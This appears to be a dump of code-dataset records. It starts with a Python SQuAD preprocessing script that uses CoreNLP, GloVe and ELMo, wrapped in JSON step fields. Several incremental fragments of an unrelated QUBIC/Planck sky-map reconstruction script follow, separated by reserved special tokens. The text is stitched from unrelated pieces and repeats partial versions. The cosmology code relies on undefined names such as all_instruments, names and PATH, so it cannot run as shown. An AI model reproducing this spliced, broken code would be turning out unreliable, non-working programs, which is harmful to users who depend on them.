= line.split()\n word = ''.join(array[0:-vec_size])\n vector = list(map(float, array[-vec_size:]))\n embedding_dict[word] = vector\n TRANSLATE = {'-lsb-': '[', '-rsb-': ']', '-lrb-': '(', '-rrb-': ')',\n '-lcb-': '{', '-rcb-': '}', '-LSB-': '[', '-RSB-': ']', '-LRB-':\n '(', '-RRB-': ')', '-LCB-': '{', '-RCB-': '}'}\n SPECIAL_TOKENS = ['<NULL>', '<UNK>', '<S>', '</S>']\n words = list(map(lambda x: x[0], sorted(counter.items(), key=lambda x:\n x[1], reverse=True)))\n words = SPECIAL_TOKENS + words\n if vocab_size > 0:\n words = words[:vocab_size]\n with open(vocab_file, 'w') as f:\n f.write('\\n'.join(words[1:]))\n embedding = np.random.normal(scale=0.1, size=(len(words), vec_size))\n word2idx_dict = {}\n unknown_count = 0\n for i, word in enumerate(words):\n word2idx_dict[word] = i\n if word in TRANSLATE:\n word = TRANSLATE[word]\n done = False\n for w in (word, word.lower(), word.upper(), word.capitalize()):\n if w in embedding_dict:\n embedding[i] = embedding_dict[w]\n done = True\n break\n if not done:\n unknown_count += 1\n return embedding, word2idx_dict, unknown_count\n\n\ndef get_tag_embedding(counter, data_type, vec_size):\n \"\"\"\n get pos/ner/label tags' embedding matrix\n \"\"\"\n print('Generating {} tag embedding...'.format(data_type))\n SPECIAL_TOKENS = ['<NULL>', '<UNK>']\n tags = list(map(lambda x: x[0], sorted(counter.items(), key=lambda x: x\n [1], reverse=True)))\n tags = SPECIAL_TOKENS + tags\n embedding = np.random.normal(scale=0.1, size=(len(tags), vec_size))\n word2idx_dict = {w: i for i, w in enumerate(tags)}\n return embedding, word2idx_dict\n\n\ndef get_vocab(config):\n print('Get the vocabulary...')\n word_counter, char_counter = Counter(), Counter()\n pos_counter, ner_counter, label_counter = Counter(), Counter(), Counter()\n files = [(config.train_para_file, config.train_question_file), (config.\n dev_para_file, config.dev_question_file)]\n for para_file, que_file in files:\n with open('{}.tok'.format(para_file), 'r') as fp, open('{}.tok'.\n format(que_file), 'r') as fq, open('{}.pos'.format(para_file), 'r'\n ) as fpp, open('{}.pos'.format(que_file), 'r') as fqp, open(\n '{}.ner'.format(para_file), 'r') as fpn, open('{}.ner'.format(\n que_file), 'r') as fqn, open('{}.label'.format(para_file), 'r'\n ) as fpl:\n while True:\n para, question = fp.readline(), fq.readline()\n pos, que_pos = fpp.readline(), fqp.readline()\n ner, que_ner = fpn.readline(), fqn.readline()\n label = fpl.readline()\n if not question or not para:\n break\n if config.lower_word:\n para = para.lower()\n question = question.lower()\n para_tokens = para.strip().split(' ')\n que_tokens = question.strip().split(' ')\n pos_tags = pos.strip().split(' ')\n ner_tags = ner.strip().split(' ')\n que_pos_tags = que_pos.strip().split(' ')\n que_ner_tags = que_ner.strip().split(' ')\n labels = label.strip().split(' ')\n for token in (para_tokens + que_tokens):\n word_counter[token] += 1\n for char in list(token):\n char_counter[char] += 1\n for pos_tag in (pos_tags + que_pos_tags):\n pos_counter[pos_tag] += 1\n for ner_tag in (ner_tags + que_ner_tags):\n ner_counter[ner_tag] += 1\n for label in labels:\n label_counter[label] += 1\n word_emb_mat, word2idx_dict, unk_num = get_word_embedding(word_counter,\n emb_file=config.glove_word_file, emb_size=config.glove_word_size,\n vocab_size=config.vocab_size_limit, vec_size=config.glove_dim,\n vocab_file=config.vocab_file)\n char_emb_mat, char2idx_dict = get_tag_embedding(char_counter, 'char',\n vec_size=config.char_dim)\n pos_emb_mat, pos2idx_dict = get_tag_embedding(pos_counter, 'pos',\n vec_size=config.pos_dim)\n ner_emb_mat, ner2idx_dict = get_tag_embedding(ner_counter, 'ner',\n vec_size=config.ner_dim)\n label_emb_mat, label2idx_dict = get_tag_embedding(label_counter,\n 'label', vec_size=config.label_dim)\n print('{} out of {} are not in glove'.format(unk_num, len(word2idx_dict)))\n print('{} chars'.format(char_emb_mat.shape[0]))\n print('{} pos tags, {} ner tags, {} answer labels, {} chars'.format(\n pos_emb_mat.shape[0], ner_emb_mat.shape[0], label_emb_mat.shape[0],\n char_emb_mat.shape[0]))\n save(config.word_emb_file, word_emb_mat, message='word embedding')\n save(config.char_emb_file, char_emb_mat, message='char embedding')\n save(config.pos_emb_file, pos_emb_mat, message='pos embedding')\n save(config.ner_emb_file, ner_emb_mat, message='ner embedding')\n save(config.label_emb_file, label_emb_mat, message='label embedding')\n save(config.word_dictionary, word2idx_dict, message='word dictionary')\n save(config.char_dictionary, char2idx_dict, message='char dictionary')\n save(config.pos_dictionary, pos2idx_dict, message='pos dictionary')\n save(config.ner_dictionary, ner2idx_dict, message='ner dictionary')\n save(config.label_dictionary, label2idx_dict, message='label dictionary')\n print('Dump elmo word embedding...')\n token_embedding_file = config.embedding_file\n dump_token_embeddings(config.vocab_file, config.elmo_options_file,\n config.elmo_weight_file, token_embedding_file)\n\n\nif __name__ == '__main__':\n os.system(\n 'mkdir data; mkdir data/processed; mkdir data/processed/train; mkdir data/processed/dev; mkdir data/processed/test'\n )\n get_data('../../LIB/squad/train-v1.1.json',\n '../../LIB/squad/dev-v1.1.json', '../../LIB/squad/doclist-test.txt',\n 'data/processed')\n",
"step-5": "\"\"\"\nData pre-processing\n\"\"\"\nimport os\nimport corenlp\nimport numpy as np\nimport ujson as json\nfrom tqdm import tqdm\nfrom collections import Counter\nfrom bilm import dump_token_embeddings\nimport sys\nsys.path.append('../..')\n\nfrom LIB.utils import save\n\n\ndef process(json_file, outpur_dir, exclude_titles=None, include_titles=None):\n \"\"\"\n :param json_file: original data in json format\n :param outpur_dir: the output directory of pre-processed data\n :param exclude_titles: article titles to exclude\n :param include_titles: article titles to include\n \"\"\"\n para_file = \"{}/paras\".format(outpur_dir)\n question_file = \"{}/questions\".format(outpur_dir)\n sent_file = \"{}/sents\".format(outpur_dir)\n answer_file = \"{}/answers\".format(outpur_dir)\n print(\"Generating {} raw data...\".format(json_file))\n max_sent, max_sent_len, max_que_len, max_ans_len = 0, 0, 0, 0\n with open(json_file, \"r\") as fh, corenlp.CoreNLPClient(annotators=\"tokenize ssplit pos ner\".split(),\n endpoint=\"http://localhost:9099\", timeout=50000) as client:\n source = json.load(fh)\n for article in tqdm(source[\"data\"]):\n title = article[\"title\"]\n if include_titles and title not in include_titles:\n continue\n if exclude_titles and title in exclude_titles:\n continue\n for para in article[\"paragraphs\"]:\n paragraphs, questions, answers, sents, ids = [], [], [], [], []\n paragraphs_pos, questions_pos, answers_pos, sents_pos = [], [], [], []\n paragraphs_ner, questions_ner, answers_ner, sents_ner = [], [], [], []\n answers_index, sents_index = [], []\n # paragraph\n context = para[\"context\"]\n if not context.strip():\n continue\n ann_para = client.annotate(context)\n max_sent = max(max_sent, len(ann_para.sentence))\n max_sent_len = max(max_sent_len, max(map(lambda x: len(x.token), ann_para.sentence)))\n ann_para_tokens, paragraph_tokens, paragraph_pos, paragraph_ner = [], [], [], []\n for sent in ann_para.sentence:\n for token in sent.token:\n ann_para_tokens.append(token)\n paragraph_tokens.append(token.word)\n paragraph_pos.append(token.pos)\n paragraph_ner.append(token.ner)\n\n # questions\n for qa in para[\"qas\"]:\n # question\n ques = qa[\"question\"]\n id = qa[\"id\"]\n if not ques.strip():\n continue\n ann_que = client.annotate(ques)\n max_que_len = max(max_que_len, len(ann_que.sentence[0].token))\n question_tokens, question_pos, question_ner = [], [], []\n for sent in ann_que.sentence:\n for token in sent.token:\n question_tokens.append(token.word)\n question_pos.append(token.pos)\n question_ner.append(token.ner)\n\n # answer\n all_answer_tokens, all_answer_pos, all_answer_ner, all_answer_index = [], [], [], []\n all_sent_tokens, all_sent_pos, all_sent_ner, all_sent_index = [], [], [], []\n for answer in qa[\"answers\"]:\n answer_text = answer[\"text\"]\n if not answer_text.strip():\n continue\n ann_ans = client.annotate(answer_text)\n answer_tokens, answer_pos, answer_ner = [], [], []\n for sent in ann_ans.sentence:\n for token in sent.token:\n answer_tokens.append(token.word)\n answer_pos.append(token.pos)\n answer_ner.append(token.ner)\n all_answer_tokens.append(' '.join(answer_tokens))\n all_answer_pos.append(' '.join(answer_pos))\n all_answer_ner.append(' '.join(answer_ner))\n\n answer_start = answer['answer_start']\n answer_end = answer_start + len(answer_text)\n # sentence\n sentence = []\n for sent in ann_para.sentence:\n if sent.characterOffsetBegin <= answer_start <= sent.characterOffsetEnd or \\\n sent.characterOffsetBegin <= answer_end <= sent.characterOffsetEnd:\n sentence.append(sent)\n sentence = [token for sent in sentence for token in sent.token]\n sentence_tokens = [token.word for token in sentence]\n sentence_pos = [token.pos for token in sentence]\n sentence_ner = [token.ner for token in sentence]\n all_sent_tokens.append(' '.join(sentence_tokens))\n all_sent_pos.append(' '.join(sentence_pos))\n all_sent_ner.append(' '.join(sentence_ner))\n\n # sentence index\n y1_sent = sentence[0].tokenBeginIndex\n y2_sent = sentence[-1].tokenBeginIndex\n # answer index\n y1_ans = None\n for i, token in enumerate(sentence):\n if token.beginChar - 1 <= answer_start <= token.endChar:\n y1_ans = sentence[0].tokenBeginIndex + i\n try:\n assert y1_ans != None\n except:\n continue\n y2_ans = y1_ans + len(answer_tokens) - 1\n all_answer_index.append(\"{},{}\".format(y1_ans, y2_ans))\n all_sent_index.append(\"{},{}\".format(y1_sent, y2_sent))\n\n paragraphs.append(' '.join(paragraph_tokens))\n paragraphs_pos.append(' '.join(paragraph_pos))\n paragraphs_ner.append(' '.join(paragraph_ner))\n questions.append(' '.join(question_tokens))\n questions_pos.append(' '.join(question_pos))\n questions_ner.append(' '.join(question_ner))\n answers.append('\\t'.join(all_answer_tokens))\n answers_pos.append('\\t'.join(all_answer_pos))\n answers_ner.append('\\t'.join(all_answer_ner))\n answers_index.append('\\t'.join(all_answer_index))\n sents.append('\\t'.join(all_sent_tokens))\n sents_pos.append('\\t'.join(all_sent_pos))\n sents_ner.append('\\t'.join(all_sent_ner))\n sents_index.append('\\t'.join(all_sent_index))\n ids.append(id)\n\n # save para\n with open(\"{}.tok\".format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs) + '\\n')\n with open(\"{}.pos\".format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs_pos) + '\\n')\n with open(\"{}.ner\".format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs_ner) + '\\n')\n with open(\"{}.id\".format(para_file), 'a') as f:\n f.write('\\n'.join(ids) + '\\n')\n # save question\n with open(\"{}.tok\".format(question_file), 'a') as f:\n f.write('\\n'.join(questions) + '\\n')\n with open(\"{}.pos\".format(question_file), 'a') as f:\n f.write('\\n'.join(questions_pos) + '\\n')\n with open(\"{}.ner\".format(question_file), 'a') as f:\n f.write('\\n'.join(questions_ner) + '\\n')\n\n # save answer\n with open(\"{}.tok\".format(answer_file), 'a') as f:\n f.write('\\n'.join(answers) + '\\n')\n with open(\"{}.pos\".format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_pos) + '\\n')\n with open(\"{}.ner\".format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_ner) + '\\n')\n with open(\"{}.index\".format(answer_file), 'a') as f:\n f.write(\"\\n\".join(answers_index) + '\\n')\n\n # save sent\n with open(\"{}.tok\".format(sent_file), 'a') as f:\n f.write('\\n'.join(sents) + '\\n')\n with open(\"{}.pos\".format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_pos) + '\\n')\n with open(\"{}.ner\".format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_ner) + '\\n')\n with open(\"{}.index\".format(sent_file), 'a') as f:\n f.write(\"\\n\".join(sents_index) + '\\n')\n # get BIO labels\n label(para_file, answer_file)\n\n\ndef label(para_file, answer_file):\n # get the answer BIO label for paragraph\n max_node = 0\n with open(\"{}.tok\".format(para_file), 'r') as fp, open(\"{}.label\".format(para_file), 'a') as fl, \\\n open(\"{}.index\".format(answer_file), 'r') as fa:\n while True:\n para = fp.readline()\n if not para:\n break\n words = [p for p in para.strip().split(' ')]\n max_node = max(len(words), max_node)\n answer = fa.readline()\n labels = []\n try:\n start, end = map(int, answer.split('\\t')[0].split(','))\n for i in range(len(words)):\n if start <= i <= end:\n # answer words\n if i == start:\n labels.append('B')\n else:\n labels.append('I')\n else:\n # non answer words\n labels.append('O')\n except:\n pass\n fl.write(' '.join(labels) + '\\n')\n return max_node\n\n\ndef get_data(train_json, dev_json, test_title_file, output_dir):\n test_titles = open(test_title_file, 'r').readlines()\n test_titles = set([line.strip() for line in test_titles])\n\n process(train_json, \"{}/train/\".format(output_dir), exclude_titles=test_titles)\n process(dev_json, \"{}/dev/\".format(output_dir))\n process(train_json, \"{}/test/\".format(output_dir), include_titles=test_titles)\n\n\ndef get_word_embedding(counter, emb_file, emb_size, vocab_size, vec_size, vocab_file):\n \"\"\"\n get word embedding matrix from glove\n \"\"\"\n print(\"Generating word embedding...\")\n # load word embeddings\n embedding_dict = {}\n with open(emb_file, \"r\", encoding=\"utf-8\") as fh:\n for line in tqdm(fh, total=emb_size):\n array = line.split()\n word = \"\".join(array[0:-vec_size])\n vector = list(map(float, array[-vec_size:]))\n embedding_dict[word] = vector\n\n TRANSLATE = {\n \"-lsb-\": \"[\", \"-rsb-\": \"]\", \"-lrb-\": \"(\", \"-rrb-\": \")\", \"-lcb-\": \"{\",\n \"-rcb-\": \"}\", \"-LSB-\": \"[\", \"-RSB-\": \"]\", \"-LRB-\": \"(\", \"-RRB-\": \")\",\n \"-LCB-\": \"{\", \"-RCB-\": \"}\"\n }\n SPECIAL_TOKENS = [\"<NULL>\", \"<UNK>\", \"<S>\", \"</S>\"]\n words = list(map(lambda x: x[0], sorted(counter.items(), key=lambda x: x[1], reverse=True)))\n words = SPECIAL_TOKENS + words\n if vocab_size > 0:\n words = words[:vocab_size]\n with open(vocab_file, 'w') as f:\n f.write('\\n'.join(words[1:]))\n embedding = np.random.normal(scale=0.1, size=(len(words), vec_size))\n word2idx_dict = {}\n unknown_count = 0\n for i, word in enumerate(words):\n word2idx_dict[word] = i\n if word in TRANSLATE:\n word = TRANSLATE[word]\n done = False\n for w in (word, word.lower(), word.upper(), word.capitalize()):\n if w in embedding_dict:\n embedding[i] = embedding_dict[w]\n done = True\n break\n if not done:\n unknown_count += 1\n return embedding, word2idx_dict, unknown_count\n\n\ndef get_tag_embedding(counter, data_type, vec_size):\n \"\"\"\n get pos/ner/label tags' embedding matrix\n \"\"\"\n print(\"Generating {} tag embedding...\".format(data_type))\n SPECIAL_TOKENS = [\"<NULL>\", \"<UNK>\"]\n tags = list(map(lambda x: x[0], sorted(counter.items(), key=lambda x: x[1], reverse=True)))\n tags = SPECIAL_TOKENS + tags\n embedding = np.random.normal(scale=0.1, size=(len(tags), vec_size))\n word2idx_dict = {w: i for i, w in enumerate(tags)}\n return embedding, word2idx_dict\n\n\ndef get_vocab(config):\n print(\"Get the vocabulary...\")\n word_counter, char_counter = Counter(), Counter()\n pos_counter, ner_counter, label_counter = Counter(), Counter(), Counter()\n files = [(config.train_para_file, config.train_question_file), (config.dev_para_file, config.dev_question_file)]\n for para_file, que_file in files:\n with open(\"{}.tok\".format(para_file), 'r') as fp, open(\"{}.tok\".format(que_file), 'r') as fq, \\\n open(\"{}.pos\".format(para_file), 'r') as fpp, open(\"{}.pos\".format(que_file), 'r') as fqp, \\\n open(\"{}.ner\".format(para_file), 'r') as fpn, open(\"{}.ner\".format(que_file), 'r') as fqn, \\\n open(\"{}.label\".format(para_file), 'r') as fpl:\n while True:\n para, question = fp.readline(), fq.readline()\n pos, que_pos = fpp.readline(), fqp.readline()\n ner, que_ner = fpn.readline(), fqn.readline()\n label = fpl.readline()\n if not question or not para:\n break\n if config.lower_word:\n para = para.lower()\n question = question.lower()\n para_tokens = para.strip().split(' ')\n que_tokens = question.strip().split(' ')\n pos_tags = pos.strip().split(' ')\n ner_tags = ner.strip().split(' ')\n que_pos_tags = que_pos.strip().split(' ')\n que_ner_tags = que_ner.strip().split(' ')\n labels = label.strip().split(' ')\n for token in para_tokens + que_tokens:\n word_counter[token] += 1\n for char in list(token):\n char_counter[char] += 1\n for pos_tag in pos_tags + que_pos_tags:\n pos_counter[pos_tag] += 1\n for ner_tag in ner_tags + que_ner_tags:\n ner_counter[ner_tag] += 1\n for label in labels:\n label_counter[label] += 1\n word_emb_mat, word2idx_dict, unk_num = get_word_embedding(word_counter, emb_file=config.glove_word_file,\n emb_size=config.glove_word_size,\n vocab_size=config.vocab_size_limit,\n vec_size=config.glove_dim, vocab_file=config.vocab_file)\n char_emb_mat, char2idx_dict = get_tag_embedding(char_counter, \"char\", vec_size=config.char_dim)\n pos_emb_mat, pos2idx_dict = get_tag_embedding(pos_counter, \"pos\", vec_size=config.pos_dim)\n ner_emb_mat, ner2idx_dict = get_tag_embedding(ner_counter, \"ner\", vec_size=config.ner_dim)\n label_emb_mat, label2idx_dict = get_tag_embedding(label_counter, \"label\", vec_size=config.label_dim)\n print(\"{} out of {} are not in glove\".format(unk_num, len(word2idx_dict)))\n print(\"{} chars\".format(char_emb_mat.shape[0]))\n print(\"{} pos tags, {} ner tags, {} answer labels, {} chars\".format(\n pos_emb_mat.shape[0], ner_emb_mat.shape[0], label_emb_mat.shape[0], char_emb_mat.shape[0]))\n save(config.word_emb_file, word_emb_mat, message=\"word embedding\")\n save(config.char_emb_file, char_emb_mat, message=\"char embedding\")\n save(config.pos_emb_file, pos_emb_mat, message=\"pos embedding\")\n save(config.ner_emb_file, ner_emb_mat, message=\"ner embedding\")\n save(config.label_emb_file, label_emb_mat, message=\"label embedding\")\n save(config.word_dictionary, word2idx_dict, message=\"word dictionary\")\n save(config.char_dictionary, char2idx_dict, message=\"char dictionary\")\n save(config.pos_dictionary, pos2idx_dict, message=\"pos dictionary\")\n save(config.ner_dictionary, ner2idx_dict, message=\"ner dictionary\")\n save(config.label_dictionary, label2idx_dict, message=\"label dictionary\")\n print(\"Dump elmo word embedding...\")\n token_embedding_file = config.embedding_file\n dump_token_embeddings(\n config.vocab_file, config.elmo_options_file, config.elmo_weight_file, token_embedding_file\n )\n\n\nif __name__ == '__main__':\n # process data\n os.system(\"mkdir data; mkdir data/processed; mkdir data/processed/train; \"\n \"mkdir data/processed/dev; mkdir data/processed/test\")\n get_data(\"../../LIB/squad/train-v1.1.json\", \"../../LIB/squad/dev-v1.1.json\",\n \"../../LIB/squad/doclist-test.txt\", \"data/processed\")",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
def statstr(vec):
m = np.mean(vec)
s = np.std(vec)
return '{0:.4f} +/- {1:.4f}'.format(m, s)
def plotinst(inst, shift=0.12):
for xyc, quad in zip(inst.detector.center, inst.detector.quadrant):
if quad < 4:
plot(xyc[0], xyc[1], 'ro')
else:
plot(xyc[0] + shift, xyc[1], 'bo')
xlim(-0.06, 0.18)
def display(input, msg, iplot=1, reso=5, Trange=[100, 5, 5]):
out = []
for i, (kind, lim) in enumerate(zip('IQU', Trange)):
map = input[..., i]
out += [hp.gnomview(map, rot=center, reso=reso, xsize=800, min=-lim,
max=lim, title=msg + ' ' + kind, sub=(3, 3, iplot + i),
return_projected_map=True)]
return out
def profile(x, y, range=None, nbins=10, fmt=None, plot=True, dispersion=
True, color=None):
if range == None:
mini = np.min(x)
maxi = np.max(x)
else:
mini = range[0]
maxi = range[1]
dx = (maxi - mini) / nbins
xmin = np.linspace(mini, maxi - dx, nbins)
xmax = xmin + dx
xc = xmin + dx / 2
yval = np.zeros(nbins)
dy = np.zeros(nbins)
dx = np.zeros(nbins) + dx / 2
for i in np.arange(nbins):
ok = (x > xmin[i]) & (x < xmax[i])
yval[i] = np.mean(y[ok])
if dispersion:
fact = 1
else:
fact = np.sqrt(len(y[ok]))
dy[i] = np.std(y[ok]) / fact
if plot:
errorbar(xc, yval, xerr=dx, yerr=dy, fmt=fmt, color=color)
return xc, yval, dx, dy
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def statstr(vec):
m = np.mean(vec)
s = np.std(vec)
return '{0:.4f} +/- {1:.4f}'.format(m, s)
def plotinst(inst, shift=0.12):
for xyc, quad in zip(inst.detector.center, inst.detector.quadrant):
if quad < 4:
plot(xyc[0], xyc[1], 'ro')
else:
plot(xyc[0] + shift, xyc[1], 'bo')
xlim(-0.06, 0.18)
def display(input, msg, iplot=1, reso=5, Trange=[100, 5, 5]):
out = []
for i, (kind, lim) in enumerate(zip('IQU', Trange)):
map = input[..., i]
out += [hp.gnomview(map, rot=center, reso=reso, xsize=800, min=-lim,
max=lim, title=msg + ' ' + kind, sub=(3, 3, iplot + i),
return_projected_map=True)]
return out
def profile(x, y, range=None, nbins=10, fmt=None, plot=True, dispersion=
True, color=None):
if range == None:
mini = np.min(x)
maxi = np.max(x)
else:
mini = range[0]
maxi = range[1]
dx = (maxi - mini) / nbins
xmin = np.linspace(mini, maxi - dx, nbins)
xmax = xmin + dx
xc = xmin + dx / 2
yval = np.zeros(nbins)
dy = np.zeros(nbins)
dx = np.zeros(nbins) + dx / 2
for i in np.arange(nbins):
ok = (x > xmin[i]) & (x < xmax[i])
yval[i] = np.mean(y[ok])
if dispersion:
fact = 1
else:
fact = np.sqrt(len(y[ok]))
dy[i] = np.std(y[ok]) / fact
if plot:
errorbar(xc, yval, xerr=dx, yerr=dy, fmt=fmt, color=color)
return xc, yval, dx, dy
<|reserved_special_token_0|>
for i in xrange(len(all_instruments)):
acq_qubic = QubicAcquisition(150, sampling, nside=nside, detector_nep=
detector_nep[i])
all_coverages.append(acq_qubic.get_coverage())
convolved_sky = acq_qubic.instrument.get_convolution_peak_operator()(sky)
acq_planck = PlanckAcquisition(150, acq_qubic.scene, true_sky=convolved_sky
)
acq_fusion = QubicPlanckAcquisition(acq_qubic, acq_planck)
H = acq_fusion.get_operator()
invntt = acq_fusion.get_invntt_operator()
obs = acq_fusion.get_observation()
A = H.T * invntt * H
b = H.T * invntt * obs
solution_fusion = pcg(A, b, disp=True)
all_solutions_fusion.append(solution_fusion)
<|reserved_special_token_0|>
for i in xrange(len(nbptg)):
figure(i)
resid = all_solutions_fusion[i]['x'] - convolved_sky
resid[~mask, :] = 0
display(resid, 'Difference map', iplot=7, reso=reso, Trange=Trange)
print(std(resid[mask, 0]), std(resid[mask, 1]), std(resid[mask, 2]))
<|reserved_special_token_0|>
clf()
for i in xrange(len(all_instruments)):
resid = all_solutions_fusion[i]['x'] - convolved_sky
idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
subplot(3, 1, 1)
yscale('log')
xlabel('Normalized coverage')
ylabel('I RMS residuals')
ylim(0.1, 2)
plot(idata[0], idata[3], color=cols[i], label=names[i], lw=2)
if i == 0:
plot(idata[0], idata[3] * sqrt(2), '--', color=cols[i], label=names
[i] + ' x sqrt(2)', lw=2)
legend(fontsize=fs, loc='upper right')
subplot(3, 1, 2)
yscale('log')
xlabel('Normalized coverage')
ylabel('Q RMS residuals')
ylim(0.1, 2)
plot(qdata[0], qdata[3], color=cols[i], label=names[i], lw=2)
if i == 0:
plot(qdata[0], qdata[3] * sqrt(2), '--', color=cols[i], label=names
[i] + ' x sqrt(2)', lw=2)
legend(fontsize=fs, loc='upper right')
subplot(3, 1, 3)
yscale('log')
xlabel('Normalized coverage')
ylabel('U RMS residuals')
ylim(0.1, 2)
plot(udata[0], udata[3], color=cols[i], label=names[i], lw=2)
if i == 0:
plot(udata[0], udata[3] * sqrt(2), '--', color=cols[i], label=names
[i] + ' x sqrt(2)', lw=2)
legend(fontsize=fs, loc='upper right')
<|reserved_special_token_0|>
clf()
for i in xrange(len(all_instruments)):
resid = all_solutions_fusion[i]['x'] - convolved_sky
idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
if i == 0:
theidata = idata
theqdata = qdata
theudata = udata
subplot(3, 1, 1)
xlabel('Normalized coverage')
ylabel('I RMS residuals ratio \n w.r.t. Full Instrument')
ylim(0.0, 3)
plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')
plot(idata[0], idata[3] / theidata[3], color=cols[i], label=names[i], lw=2)
legend(fontsize=fs, loc='upper right')
subplot(3, 1, 2)
xlabel('Normalized coverage')
ylabel('Q RMS residuals ratio \n w.r.t. Full Instrument')
ylim(0.0, 3)
plot(qdata[0], qdata[3] / theqdata[3], color=cols[i], label=names[i], lw=2)
plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')
legend(fontsize=fs, loc='upper right')
subplot(3, 1, 3)
xlabel('Normalized coverage')
ylabel('U RMS residuals ratio \n w.r.t. Full Instrument')
ylim(0.0, 3)
plot(udata[0], udata[3] / theudata[3], color=cols[i], label=names[i], lw=2)
plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')
legend(fontsize=fs, loc='upper right')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def statstr(vec):
m = np.mean(vec)
s = np.std(vec)
return '{0:.4f} +/- {1:.4f}'.format(m, s)
def plotinst(inst, shift=0.12):
for xyc, quad in zip(inst.detector.center, inst.detector.quadrant):
if quad < 4:
plot(xyc[0], xyc[1], 'ro')
else:
plot(xyc[0] + shift, xyc[1], 'bo')
xlim(-0.06, 0.18)
def display(input, msg, iplot=1, reso=5, Trange=[100, 5, 5]):
out = []
for i, (kind, lim) in enumerate(zip('IQU', Trange)):
map = input[..., i]
out += [hp.gnomview(map, rot=center, reso=reso, xsize=800, min=-lim,
max=lim, title=msg + ' ' + kind, sub=(3, 3, iplot + i),
return_projected_map=True)]
return out
def profile(x, y, range=None, nbins=10, fmt=None, plot=True, dispersion=
True, color=None):
if range == None:
mini = np.min(x)
maxi = np.max(x)
else:
mini = range[0]
maxi = range[1]
dx = (maxi - mini) / nbins
xmin = np.linspace(mini, maxi - dx, nbins)
xmax = xmin + dx
xc = xmin + dx / 2
yval = np.zeros(nbins)
dy = np.zeros(nbins)
dx = np.zeros(nbins) + dx / 2
for i in np.arange(nbins):
ok = (x > xmin[i]) & (x < xmax[i])
yval[i] = np.mean(y[ok])
if dispersion:
fact = 1
else:
fact = np.sqrt(len(y[ok]))
dy[i] = np.std(y[ok]) / fact
if plot:
errorbar(xc, yval, xerr=dx, yerr=dy, fmt=fmt, color=color)
return xc, yval, dx, dy
nside = 256
racenter = 0.0
deccenter = -57.0
center = equ2gal(racenter, deccenter)
sky = read_map(PATH + 'syn256_pol.fits')
sampling = create_random_pointings([racenter, deccenter], 1000, 10)
all_solutions_fusion = []
all_coverages = []
nbptg = np.linspace(1000, 5000, 5)
correct_time = 365 * 86400.0 / (nbptg / 1000)
detector_nep = 4.7e-17 / np.sqrt(correct_time / len(sampling) * sampling.period
)
for i in xrange(len(all_instruments)):
acq_qubic = QubicAcquisition(150, sampling, nside=nside, detector_nep=
detector_nep[i])
all_coverages.append(acq_qubic.get_coverage())
convolved_sky = acq_qubic.instrument.get_convolution_peak_operator()(sky)
acq_planck = PlanckAcquisition(150, acq_qubic.scene, true_sky=convolved_sky
)
acq_fusion = QubicPlanckAcquisition(acq_qubic, acq_planck)
H = acq_fusion.get_operator()
invntt = acq_fusion.get_invntt_operator()
obs = acq_fusion.get_observation()
A = H.T * invntt * H
b = H.T * invntt * obs
solution_fusion = pcg(A, b, disp=True)
all_solutions_fusion.append(solution_fusion)
mask = all_coverages[0] > np.max(all_coverages[0] / 10)
reso = 3
Trange = [10, 10, 10]
for i in xrange(len(nbptg)):
figure(i)
resid = all_solutions_fusion[i]['x'] - convolved_sky
resid[~mask, :] = 0
display(resid, 'Difference map', iplot=7, reso=reso, Trange=Trange)
print(std(resid[mask, 0]), std(resid[mask, 1]), std(resid[mask, 2]))
cols = ['black', 'red', 'blue', 'green', 'orange']
aa = 0.2
rng = [-2, 4]
fs = 8
nb = 20
clf()
for i in xrange(len(all_instruments)):
resid = all_solutions_fusion[i]['x'] - convolved_sky
idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
subplot(3, 1, 1)
yscale('log')
xlabel('Normalized coverage')
ylabel('I RMS residuals')
ylim(0.1, 2)
plot(idata[0], idata[3], color=cols[i], label=names[i], lw=2)
if i == 0:
plot(idata[0], idata[3] * sqrt(2), '--', color=cols[i], label=names
[i] + ' x sqrt(2)', lw=2)
legend(fontsize=fs, loc='upper right')
subplot(3, 1, 2)
yscale('log')
xlabel('Normalized coverage')
ylabel('Q RMS residuals')
ylim(0.1, 2)
plot(qdata[0], qdata[3], color=cols[i], label=names[i], lw=2)
if i == 0:
plot(qdata[0], qdata[3] * sqrt(2), '--', color=cols[i], label=names
[i] + ' x sqrt(2)', lw=2)
legend(fontsize=fs, loc='upper right')
